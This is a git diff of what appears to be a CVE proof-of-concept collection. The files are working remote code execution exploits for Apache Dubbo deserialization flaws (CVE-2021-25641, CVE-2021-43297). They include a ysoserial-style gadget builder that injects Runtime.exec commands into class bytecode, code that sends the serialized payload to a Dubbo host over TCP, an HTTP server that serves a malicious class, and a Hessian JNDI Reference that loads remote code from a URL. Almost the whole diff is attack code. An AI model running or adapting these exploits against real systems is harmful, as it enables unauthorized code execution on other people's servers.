+        byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags,
+                0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs
+        bos.write(header);
+        // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too
+        /*
+        objectOutput.writeUTF("notAversion");
+        objectOutput.writeUTF("notAservice");
+        objectOutput.writeUTF("notAserviceVersion");
+        objectOutput.writeUTF("notAmethod");
+        objectOutput.writeUTF("notAtype"); //*/
+
+	// This section contains valid data writes
+        RpcInvocation ri = new RpcInvocation();
+        ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class});
+        //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;");
+        ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}});
+        // Strings need only satisfy "readUTF" calls until "readObject" is reached
+
+        // /*
+        objectOutput.writeUTF("2.0.2");
+        objectOutput.writeUTF("org.apache.dubbo.demo.DemoService");
+        objectOutput.writeUTF("0.0.0");
+        objectOutput.writeUTF("sayHello");
+        objectOutput.writeUTF("Ljava/lang/String;"); //*/
+
+        objectOutput.writeObject(gadgetChain);
+        objectOutput.writeObject(ri.getAttachments());
+
+        objectOutput.flushBuffer();
+        byte[] payload = bos.toByteArray();
+        int len = payload.length - header.length;
+        Bytes.int2bytes(len, payload, 12);
+
+        // Dubbo Message Stream Hex Dump
+        for (int i = 0; i < payload.length; i++) {
+            System.out.print(String.format("%02X", payload[i]) + " ");
+            if ((i + 1) % 8 == 0)
+                System.out.print(" ");
+            if ((i + 1) % 16 == 0 )
+                System.out.println();
+
+        }
+        // Payload string
+        System.out.println();
+        System.out.println(new String(payload));
+
+        Socket pingSocket = null;
+        OutputStream out = null;
+        // Send request over TCP socket
+        try {
+            pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT);
+            out = pingSocket.getOutputStream();
+        } catch (IOException e) {
+            return;
+        }
+        out.write(payload);
+        out.flush();
+        out.close();
+        pingSocket.close();
+        System.out.println("Sent!");
+    }
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java
index 8aaf5e6c..e69a8a05 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java
@@ -1,221 +1,221 @@
-package DubboProtocolExploit;
-
-import com.nqzero.permit.Permit;
-import com.sun.org.apache.xalan.internal.xsltc.DOM;
-import com.sun.org.apache.xalan.internal.xsltc.TransletException;
-import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
-import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
-import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
-import com.sun.org.apache.xpath.internal.objects.XString;
-import javassist.ClassClassPath;
-import javassist.ClassPool;
-import javassist.CtClass;
-import org.springframework.aop.target.HotSwappableTargetSource;
-import sun.reflect.ReflectionFactory;
-
-import java.io.ByteArrayOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.io.Serializable;
-import java.lang.reflect.*;
-import java.util.HashMap;
-import java.util.Map;
-
-import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
-
-/*
- * Utility class - based on code found in ysoserial, includes method calls used in
- * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were
- * consolidated into a single util class for the sake of brevity; they are otherwise unchanged.
- *
- * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger
- * to create a toString trigger
- *
- * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial
- * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec
- */
-public class Utils {
-    static {
-        // special case for using TemplatesImpl gadgets with a SecurityManager enabled
-        System.setProperty(DESERIALIZE_TRANSLET, "true");
-
-        // for RMI remote loading
-        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
-    }
-
-    public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
-
-    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
-
-        private static final long serialVersionUID = -5971610431559700674L;
-
-
-        public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {}
-
-
-        @Override
-        public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
-    }
-
-    // required to make TemplatesImpl happy
-    public static class Foo implements Serializable {
-
-        private static final long serialVersionUID = 8207363842866235160L;
-    }
-
-    public static InvocationHandler createMemoizedInvocationHandler (final Map<String, Object> map ) throws Exception {
-        return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
-    }
-
-    public static Object createTemplatesImpl ( final String command ) throws Exception {
-        if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
-            return createTemplatesImpl(
-                    command,
-                    Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
-                    Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
-                    Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));
-        }
-
-        return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
-    }
-
-
-    public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
-            throws Exception {
-        final T templates = tplClass.newInstance();
-
-        // use template gadget class
-        ClassPool pool = ClassPool.getDefault();
-        pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class));
-        pool.insertClassPath(new ClassClassPath(abstTranslet));
-        final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName());
-        // run command in static initializer
-        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
-       String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" +
-                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
-                "\");";
-        clazz.makeClassInitializer().insertAfter(cmd);
-        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
-        clazz.setName("ysoserial.Pwner" + System.nanoTime());
-        CtClass superC = pool.get(abstTranslet.getName());
-        clazz.setSuperclass(superC);
-
-        final byte[] classBytes = clazz.toBytecode();
-
-        // inject class bytes into instance
-        Utils.setFieldValue(templates, "_bytecodes", new byte[][] {
-                classBytes, Utils.classAsBytes(Utils.Foo.class)
-        });
-
-        // required to make TemplatesImpl happy
-        Utils.setFieldValue(templates, "_name", "Pwnr");
-        Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance());
-        return templates;
-    }
-
-    public static void setAccessible(AccessibleObject member) {
-        // quiet runtime warnings from JDK9+
-        Permit.setAccessible(member);
-    }
-
-    public static Field getField(final Class<?> clazz, final String fieldName) {
-        Field field = null;
-        try {
-            field = clazz.getDeclaredField(fieldName);
-            setAccessible(field);
-        }
-        catch (NoSuchFieldException ex) {
-            if (clazz.getSuperclass() != null)
-                field = getField(clazz.getSuperclass(), fieldName);
-        }
-        return field;
-    }
-
-    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
-        final Field field = getField(obj.getClass(), fieldName);
-        field.set(obj, value);
-    }
-
-    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
-        final Field field = getField(obj.getClass(), fieldName);
-        return field.get(obj);
-    }
-
-    public static Constructor<?> getFirstCtor(final String name) throws Exception {
-        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
-        setAccessible(ctor);
-        return ctor;
-    }
-
-    @SuppressWarnings ( {"unchecked"} )
-    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
-            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
-        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
-        setAccessible(objCons);
-        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
-        setAccessible(sc);
-        return (T)sc.newInstance(consArgs);
-    }
-
-    public static String classAsFile(final Class<?> clazz) {
-        return classAsFile(clazz, true);
-    }
-
-    public static String classAsFile(final Class<?> clazz, boolean suffix) {
-        String str;
-        if (clazz.getEnclosingClass() == null) {
-            str = clazz.getName().replace(".", "/");
-        } else {
-            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
-        }
-        if (suffix) {
-            str += ".class";
-        }
-        return str;
-    }
-
-    public static byte[] classAsBytes(final Class<?> clazz) {
-        try {
-            final byte[] buffer = new byte[1024];
-            final String file = classAsFile(clazz);
-            final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file);
-            if (in == null) {
-                throw new IOException("couldn't find '" + file + "'");
-            }
-            final ByteArrayOutputStream out = new ByteArrayOutputStream();
-            int len;
-            while ((len = in.read(buffer)) != -1) {
-                out.write(buffer, 0, len);
-            }
-            return out.toByteArray();
-        } catch (IOException e) {
-            throw new RuntimeException(e);
-        }
-    }
-    public static HashMap<Object, Object> makeMap (Object v1, Object v2 ) throws Exception {
-        HashMap<Object, Object> s = new HashMap<>();
-        Utils.setFieldValue(s, "size", 2);
-        Class<?> nodeC;
-        try {
-            nodeC = Class.forName("java.util.HashMap$Node");
-        }
-        catch ( ClassNotFoundException e ) {
-            nodeC = Class.forName("java.util.HashMap$Entry");
-        }
-        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
-        nodeCons.setAccessible(true);
-
-        Object tbl = Array.newInstance(nodeC, 2);
-        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
-        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
-        Utils.setFieldValue(s, "table", tbl);
-        return s;
-    }
-
-    public static Object makeXStringToStringTrigger(Object o) throws Exception {
-        XString x = new XString("HEYO");
-        return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x));
-    }
+package DubboProtocolExploit;
+
+import com.nqzero.permit.Permit;
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import com.sun.org.apache.xpath.internal.objects.XString;
+import javassist.ClassClassPath;
+import javassist.ClassPool;
+import javassist.CtClass;
+import org.springframework.aop.target.HotSwappableTargetSource;
+import sun.reflect.ReflectionFactory;
+
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.Serializable;
+import java.lang.reflect.*;
+import java.util.HashMap;
+import java.util.Map;
+
+import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET;
+
+/*
+ * Utility class - based on code found in ysoserial, includes method calls used in
+ * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were
+ * consolidated into a single util class for the sake of brevity; they are otherwise unchanged.
+ *
+ * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger
+ * to create a toString trigger
+ *
+ * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial
+ * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec
+ */
+public class Utils {
+    static {
+        // special case for using TemplatesImpl gadgets with a SecurityManager enabled
+        System.setProperty(DESERIALIZE_TRANSLET, "true");
+
+        // for RMI remote loading
+        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
+    }
+
+    public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler";
+
+    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
+
+        private static final long serialVersionUID = -5971610431559700674L;
+
+
+        public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {}
+
+
+        @Override
+        public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {}
+    }
+
+    // required to make TemplatesImpl happy
+    public static class Foo implements Serializable {
+
+        private static final long serialVersionUID = 8207363842866235160L;
+    }
+
+    public static InvocationHandler createMemoizedInvocationHandler (final Map<String, Object> map ) throws Exception {
+        return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
+    }
+
+    public static Object createTemplatesImpl ( final String command ) throws Exception {
+        if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) {
+            return createTemplatesImpl(
+                    command,
+                    Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"),
+                    Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"),
+                    Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl"));
+        }
+
+        return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
+    }
+
+
+    public static <T> T createTemplatesImpl ( final String command, Class<T> tplClass, Class<?> abstTranslet, Class<?> transFactory )
+            throws Exception {
+        final T templates = tplClass.newInstance();
+
+        // use template gadget class
+        ClassPool pool = ClassPool.getDefault();
+        pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class));
+        pool.insertClassPath(new ClassClassPath(abstTranslet));
+        final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName());
+        // run command in static initializer
+        // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections
+       String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" +
+                command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") +
+                "\");";
+        clazz.makeClassInitializer().insertAfter(cmd);
+        // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion)
+        clazz.setName("ysoserial.Pwner" + System.nanoTime());
+        CtClass superC = pool.get(abstTranslet.getName());
+        clazz.setSuperclass(superC);
+
+        final byte[] classBytes = clazz.toBytecode();
+
+        // inject class bytes into instance
+        Utils.setFieldValue(templates, "_bytecodes", new byte[][] {
+                classBytes, Utils.classAsBytes(Utils.Foo.class)
+        });
+
+        // required to make TemplatesImpl happy
+        Utils.setFieldValue(templates, "_name", "Pwnr");
+        Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance());
+        return templates;
+    }
+
+    public static void setAccessible(AccessibleObject member) {
+        // quiet runtime warnings from JDK9+
+        Permit.setAccessible(member);
+    }
+
+    public static Field getField(final Class<?> clazz, final String fieldName) {
+        Field field = null;
+        try {
+            field = clazz.getDeclaredField(fieldName);
+            setAccessible(field);
+        }
+        catch (NoSuchFieldException ex) {
+            if (clazz.getSuperclass() != null)
+                field = getField(clazz.getSuperclass(), fieldName);
+        }
+        return field;
+    }
+
+    public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        field.set(obj, value);
+    }
+
+    public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
+        final Field field = getField(obj.getClass(), fieldName);
+        return field.get(obj);
+    }
+
+    public static Constructor<?> getFirstCtor(final String name) throws Exception {
+        final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
+        setAccessible(ctor);
+        return ctor;
+    }
+
+    @SuppressWarnings ( {"unchecked"} )
+    public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
+            throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
+        Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
+        setAccessible(objCons);
+        Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
+        setAccessible(sc);
+        return (T)sc.newInstance(consArgs);
+    }
+
+    public static String classAsFile(final Class<?> clazz) {
+        return classAsFile(clazz, true);
+    }
+
+    public static String classAsFile(final Class<?> clazz, boolean suffix) {
+        String str;
+        if (clazz.getEnclosingClass() == null) {
+            str = clazz.getName().replace(".", "/");
+        } else {
+            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
+        }
+        if (suffix) {
+            str += ".class";
+        }
+        return str;
+    }
+
+    public static byte[] classAsBytes(final Class<?> clazz) {
+        try {
+            final byte[] buffer = new byte[1024];
+            final String file = classAsFile(clazz);
+            final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file);
+            if (in == null) {
+                throw new IOException("couldn't find '" + file + "'");
+            }
+            final ByteArrayOutputStream out = new ByteArrayOutputStream();
+            int len;
+            while ((len = in.read(buffer)) != -1) {
+                out.write(buffer, 0, len);
+            }
+            return out.toByteArray();
+        } catch (IOException e) {
+            throw new RuntimeException(e);
+        }
+    }
+    public static HashMap<Object, Object> makeMap (Object v1, Object v2 ) throws Exception {
+        HashMap<Object, Object> s = new HashMap<>();
+        Utils.setFieldValue(s, "size", 2);
+        Class<?> nodeC;
+        try {
+            nodeC = Class.forName("java.util.HashMap$Node");
+        }
+        catch ( ClassNotFoundException e ) {
+            nodeC = Class.forName("java.util.HashMap$Entry");
+        }
+        Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
+        nodeCons.setAccessible(true);
+
+        Object tbl = Array.newInstance(nodeC, 2);
+        Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null));
+        Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null));
+        Utils.setFieldValue(s, "table", tbl);
+        return s;
+    }
+
+    public static Object makeXStringToStringTrigger(Object o) throws Exception {
+        XString x = new XString("HEYO");
+        return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x));
+    }
 }
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java
index f8b4fc2f..c4065966 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java
@@ -1,5 +1,5 @@
-package org.apache.dubbo.demo;
-
-public interface DemoService {
-    public Object sayHello(Object o);
-}
+package org.apache.dubbo.demo;
+
+public interface DemoService {
+    public Object sayHello(Object o);
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
index 9651b3ac..38ac7094 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
@@ -1,7 +1,7 @@
-import java.io.IOException;
-public class ExecTest {
-    public ExecTest() throws IOException {
-        new java.io.IOException().printStackTrace();
-        java.lang.Runtime.getRuntime().exec("calc");
-    }
-}
+import java.io.IOException;
+public class ExecTest {
+    public ExecTest() throws IOException {
+        new java.io.IOException().printStackTrace();
+        java.lang.Runtime.getRuntime().exec("calc");
+    }
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
index 167cbaef..e65ac5e8 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
@@ -1,107 +1,107 @@
-import com.google.common.io.Files;
-import com.sun.net.httpserver.Headers;
-import com.sun.net.httpserver.HttpExchange;
-import com.sun.net.httpserver.HttpHandler;
-import com.sun.net.httpserver.HttpServer;
-import com.sun.net.httpserver.spi.HttpServerProvider;
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.IOException;
-import java.io.InputStreamReader;
-import java.io.OutputStream;
-import java.net.InetSocketAddress;
-import java.util.Iterator;
-import java.util.List;
-import java.util.Set;
-import org.apache.commons.lang3.StringUtils;
-
-/**
- * 解析http协议，输出http请求体
- *
- * @author xuanyh
- */
-public class HTTPServer {
-
-    public static String filePath;
-    public static int PORT = 8080;
-    public static String contentType;
-
-    public static void main(String[] args) throws IOException {
-        run(args);
-    }
-
-    public static void run(String[] args) {
-        int port = PORT;
-        String context = "/";
-        String clazz = "Calc.class";
-        if (args != null && args.length > 0) {
-            port = Integer.parseInt(args[0]);
-            context = args[1];
-            clazz = args[2];
-        }
-        HttpServerProvider provider = HttpServerProvider.provider();
-        HttpServer httpserver = null;
-        try {
-            httpserver = provider.createHttpServer(new InetSocketAddress(port), 100);
-        } catch (IOException e) {
-            e.printStackTrace();
-        }
-        //监听端口8080,
-
-        httpserver.createContext(context, new RestGetHandler(clazz));
-        httpserver.setExecutor(null);
-        httpserver.start();
-        System.out.println("server started");
-    }
-
-    static class RestGetHandler implements HttpHandler {
-
-        private String clazz;
-
-        public RestGetHandler(String clazz) {
-            this.clazz = clazz;
-        }
-
-        @Override
-        public void handle(HttpExchange he) throws IOException {
-            String requestMethod = he.getRequestMethod();
-            System.out.println(requestMethod + " " + he.getRequestURI().getPath() + (
-                    StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? ""
-                            : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol());
-            if (requestMethod.equalsIgnoreCase("GET")) {
-                Headers responseHeaders = he.getResponseHeaders();
-                responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType);
-
-                he.sendResponseHeaders(200, 0);
-                // parse request
-                OutputStream responseBody = he.getResponseBody();
-                Headers requestHeaders = he.getRequestHeaders();
-                Set<String> keySet = requestHeaders.keySet();
-                Iterator<String> iter = keySet.iterator();
-
-                while (iter.hasNext()) {
-                    String key = iter.next();
-                    List values = requestHeaders.get(key);
-                    String s = key + ": " + values.toString();
-                    System.out.println(s);
-                }
-                System.out.println();
-                BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody()));
-                StringBuilder stringBuilder = new StringBuilder();
-                String line;
-                for (;(line = bufferedReader.readLine()) != null;) {
-                    stringBuilder.append(line);
-                }
-                System.out.println(stringBuilder.toString());
-
-//                byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath));
-
-                byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class"));
-                System.out.println(new String(bytes, 0, bytes.length));
-                // send response
-                responseBody.write(bytes);
-                responseBody.close();
-            }
-        }
-    }
+import com.google.common.io.Files;
+import com.sun.net.httpserver.Headers;
+import com.sun.net.httpserver.HttpExchange;
+import com.sun.net.httpserver.HttpHandler;
+import com.sun.net.httpserver.HttpServer;
+import com.sun.net.httpserver.spi.HttpServerProvider;
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.io.OutputStream;
+import java.net.InetSocketAddress;
+import java.util.Iterator;
+import java.util.List;
+import java.util.Set;
+import org.apache.commons.lang3.StringUtils;
+
+/**
+ * 解析http协议，输出http请求体
+ *
+ * @author xuanyh
+ */
+public class HTTPServer {
+
+    public static String filePath;
+    public static int PORT = 8080;
+    public static String contentType;
+
+    public static void main(String[] args) throws IOException {
+        run(args);
+    }
+
+    public static void run(String[] args) {
+        int port = PORT;
+        String context = "/";
+        String clazz = "Calc.class";
+        if (args != null && args.length > 0) {
+            port = Integer.parseInt(args[0]);
+            context = args[1];
+            clazz = args[2];
+        }
+        HttpServerProvider provider = HttpServerProvider.provider();
+        HttpServer httpserver = null;
+        try {
+            httpserver = provider.createHttpServer(new InetSocketAddress(port), 100);
+        } catch (IOException e) {
+            e.printStackTrace();
+        }
+        //监听端口8080,
+
+        httpserver.createContext(context, new RestGetHandler(clazz));
+        httpserver.setExecutor(null);
+        httpserver.start();
+        System.out.println("server started");
+    }
+
+    static class RestGetHandler implements HttpHandler {
+
+        private String clazz;
+
+        public RestGetHandler(String clazz) {
+            this.clazz = clazz;
+        }
+
+        @Override
+        public void handle(HttpExchange he) throws IOException {
+            String requestMethod = he.getRequestMethod();
+            System.out.println(requestMethod + " " + he.getRequestURI().getPath() + (
+                    StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? ""
+                            : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol());
+            if (requestMethod.equalsIgnoreCase("GET")) {
+                Headers responseHeaders = he.getResponseHeaders();
+                responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType);
+
+                he.sendResponseHeaders(200, 0);
+                // parse request
+                OutputStream responseBody = he.getResponseBody();
+                Headers requestHeaders = he.getRequestHeaders();
+                Set<String> keySet = requestHeaders.keySet();
+                Iterator<String> iter = keySet.iterator();
+
+                while (iter.hasNext()) {
+                    String key = iter.next();
+                    List values = requestHeaders.get(key);
+                    String s = key + ": " + values.toString();
+                    System.out.println(s);
+                }
+                System.out.println();
+                BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody()));
+                StringBuilder stringBuilder = new StringBuilder();
+                String line;
+                for (;(line = bufferedReader.readLine()) != null;) {
+                    stringBuilder.append(line);
+                }
+                System.out.println(stringBuilder.toString());
+
+//                byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath));
+
+                byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class"));
+                System.out.println(new String(bytes, 0, bytes.length));
+                // send response
+                responseBody.write(bytes);
+                responseBody.close();
+            }
+        }
+    }
 }
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java
index 04f8ed45..0f0eddc9 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java
@@ -1,133 +1,133 @@
-package com.bitterz.dubbo;
-
-import com.alibaba.com.caucho.hessian.io.Hessian2Output;
-import org.apache.dubbo.common.io.Bytes;
-import org.apache.xbean.naming.context.ContextUtil;
-import org.apache.xbean.naming.context.WritableContext;
-import sun.reflect.ReflectionFactory;
-
-import javax.naming.Context;
-import javax.naming.Reference;
-import java.io.ByteArrayOutputStream;
-import java.io.OutputStream;
-import java.lang.reflect.Constructor;
-import java.lang.reflect.Field;
-import java.lang.reflect.InvocationTargetException;
-import java.net.Socket;
-import java.util.HashSet;
-import java.util.Random;
-public class HessianLitePoc {
-
-    public static void main(String[] args) throws Exception {
-
-        Context ctx = Reflections.createWithoutConstructor(WritableContext.class);
-        Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/");
-        ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx);
-
-//        Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName");
-//        fullName.setAccessible(true);
-        Reflections.setFieldValue(binding, "fullName", "<<<<<");
-//        fullName.set(binding, "<<<<<");  // 方便定位属性值的
-
-
-
-        byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1};
-        //############################################################################################
-        // 写入binding
-        ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream();
-        Hessian2Output outBinding = new Hessian2Output(binding2bytes);
-        outBinding.writeObject(binding);
-        outBinding.flushBuffer();
-        //############################################################################################
-        // binding序列化后的byte数组
-        byte[] bindingBytes = binding2bytes.toByteArray();
-
-        // header.
-        byte[] header = new byte[16];
-        // set magic number.
-        Bytes.short2bytes((short) 0xdabb, header);
-        // set request and serialization flag.
-        header[2] = (byte) ((byte) 0x80 | 0x20 | 2);
-        // set request id.
-        Bytes.long2bytes(new Random().nextInt(100000000), header, 4);
-        // 在header中记录 序列化对象 的长度，因为最后一个F被覆盖了，所以要-1
-        Bytes.int2bytes(bindingBytes.length*2-1, header, 12);
-
-        // 收集header+binding
-        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
-        byteArrayOutputStream.write(header);
-        byteArrayOutputStream.write(bindingBytes);
-        byte[] bytes = byteArrayOutputStream.toByteArray();
-
-        //############################################################################################
-        // 组装payload = header+binding+binding
-        byte[] payload = new byte[bytes.length + bindingBytes.length -1];
-        for (int i = 0; i < bytes.length; i++) {
-            payload[i] = bytes[i];
-        }
-
-        for (int i = 0; i < bindingBytes.length; i++) {
-            payload[i + bytes.length-1] = bindingBytes[i];
-        }
-        //############################################################################################
-
-        // 修改flag的值
-        payload[2] = 0x02;
-
-        // 输出字节流的十六进制
-        for (int i = 0; i < payload.length; i++) {
-            System.out.print(String.format("%02X", payload[i]) + " ");
-            if ((i + 1) % 8 == 0)
-                System.out.print(" ");
-            if ((i + 1) % 16 == 0 )
-                System.out.println();
-        }
-        System.out.println();
-        // 输出byte数组转String
-        System.out.println(new String(payload,0,payload.length));
-//        System.exit(1);
